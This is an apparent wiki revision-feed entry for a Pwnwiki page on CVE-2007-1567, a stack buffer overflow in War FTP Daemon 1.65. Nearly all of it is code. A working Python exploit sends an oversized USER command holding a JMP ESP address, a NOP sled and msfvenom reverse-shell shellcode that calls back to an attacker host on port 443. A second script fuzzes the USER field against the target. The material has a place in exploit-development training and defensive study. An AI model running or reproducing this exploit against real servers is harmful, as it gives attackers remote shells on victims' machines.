https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
CVE-2007-1567 War FTP Daemon 1.65堆棧緩衝區溢出漏洞 - Revision history
2026-04-10T03:50:12Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2007-1567_War_FTP_Daemon_1.65%E5%A0%86%E6%A3%A7%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=842&oldid=prev
Pwnwiki: Created page with "==warftp-ftp.py== <pre> #!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 774699BF FFE4 JMP ESP # bad characters \x00\x..."
2021-04-01T03:22:23Z
<p>Created page with "==warftp-ftp.py== <pre> #!/usr/bin/python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 774699BF FFE4 JMP ESP # bad characters \x00\x..."</p>
<p><b>New page</b></p><div>==warftp-ftp.py==<br />
<pre><br />
#!/usr/bin/python<br />
<br />
import socket<br />
<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
<br />
# 774699BF FFE4 JMP ESP<br />
<br />
# bad characters \x00\x0a\x0d <br />
<br />
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows<br />
<br />
shellcode = ("\xd9\xed\xba\xda\x93\x0e\xa1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"<br />
"\x52\x31\x55\x17\x83\xc5\x04\x03\x8f\x80\xec\x54\xd3\x4f\x72"<br />
"\x96\x2b\x90\x13\x1e\xce\xa1\x13\x44\x9b\x92\xa3\x0e\xc9\x1e"<br />
"\x4f\x42\xf9\x95\x3d\x4b\x0e\x1d\x8b\xad\x21\x9e\xa0\x8e\x20"<br />
"\x1c\xbb\xc2\x82\x1d\x74\x17\xc3\x5a\x69\xda\x91\x33\xe5\x49"<br />
"\x05\x37\xb3\x51\xae\x0b\x55\xd2\x53\xdb\x54\xf3\xc2\x57\x0f"<br />
"\xd3\xe5\xb4\x3b\x5a\xfd\xd9\x06\x14\x76\x29\xfc\xa7\x5e\x63"<br />
"\xfd\x04\x9f\x4b\x0c\x54\xd8\x6c\xef\x23\x10\x8f\x92\x33\xe7"<br />
"\xed\x48\xb1\xf3\x56\x1a\x61\xdf\x67\xcf\xf4\x94\x64\xa4\x73"<br />
"\xf2\x68\x3b\x57\x89\x95\xb0\x56\x5d\x1c\x82\x7c\x79\x44\x50"<br />
"\x1c\xd8\x20\x37\x21\x3a\x8b\xe8\x87\x31\x26\xfc\xb5\x18\x2f"<br />
"\x31\xf4\xa2\xaf\x5d\x8f\xd1\x9d\xc2\x3b\x7d\xae\x8b\xe5\x7a"<br />
"\xd1\xa1\x52\x14\x2c\x4a\xa3\x3d\xeb\x1e\xf3\x55\xda\x1e\x98"<br />
"\xa5\xe3\xca\x0f\xf5\x4b\xa5\xef\xa5\x2b\x15\x98\xaf\xa3\x4a"<br />
"\xb8\xd0\x69\xe3\x53\x2b\xfa\xcc\x0c\x32\x81\xa4\x4e\x34\x74"<br />
"\x8e\xc6\xd2\x1c\xe0\x8e\x4d\x89\x99\x8a\x05\x28\x65\x01\x60"<br />
"\x6a\xed\xa6\x95\x25\x06\xc2\x85\xd2\xe6\x99\xf7\x75\xf8\x37"<br />
"\x9f\x1a\x6b\xdc\x5f\x54\x90\x4b\x08\x31\x66\x82\xdc\xaf\xd1"<br />
"\x3c\xc2\x2d\x87\x07\x46\xea\x74\x89\x47\x7f\xc0\xad\x57\xb9"<br />
"\xc9\xe9\x03\x15\x9c\xa7\xfd\xd3\x76\x06\x57\x8a\x25\xc0\x3f"<br />
"\x4b\x06\xd3\x39\x54\x43\xa5\xa5\xe5\x3a\xf0\xda\xca\xaa\xf4"<br />
"\xa3\x36\x4b\xfa\x7e\xf3\x6b\x19\xaa\x0e\x04\x84\x3f\xb3\x49"<br />
"\x37\xea\xf0\x77\xb4\x1e\x89\x83\xa4\x6b\x8c\xc8\x62\x80\xfc"<br />
"\x41\x07\xa6\x53\x61\x02")<br />
<br />
buffer = "A" * 485 + "\xbf\x99\x46\x77" + "\x90" * 20 + shellcode + "C" * (5500-485-4)<br />
<br />
try:<br />
print "\nSending evil buffer..."<br />
s.connect(("192.168.1.131", 21))<br />
s.recv(1024)<br />
s.send('USER ' + buffer + '\r\n')<br />
data=s.recv(1024)<br />
print "\nDone!."<br />
except:<br />
print "Could not connect to FTP!"<br />
<br />
<br />
</pre><br />
<br />
==ftp-user-fuzz.py==<br />
<pre><br />
#!/usr/bin/python<br />
<br />
import socket<br />
<br />
buffer = ["A"]<br />
counter=100<br />
<br />
while len(buffer) < 30:<br />
buffer.append("A"*counter)<br />
counter=counter+200<br />
<br />
for string in buffer:<br />
print "Fuzzing USER with %s bytes" % len(string)<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
connect=s.connect(("192.168.1.131", 21))<br />
s.recv(1024)<br />
s.send('USER ' + string + '\r\n')<br />
s.recv(1024)<br />
s.send('QUIT\r\n')<br />
s.close()<br />
<br />
<br />
</pre></div>
Pwnwiki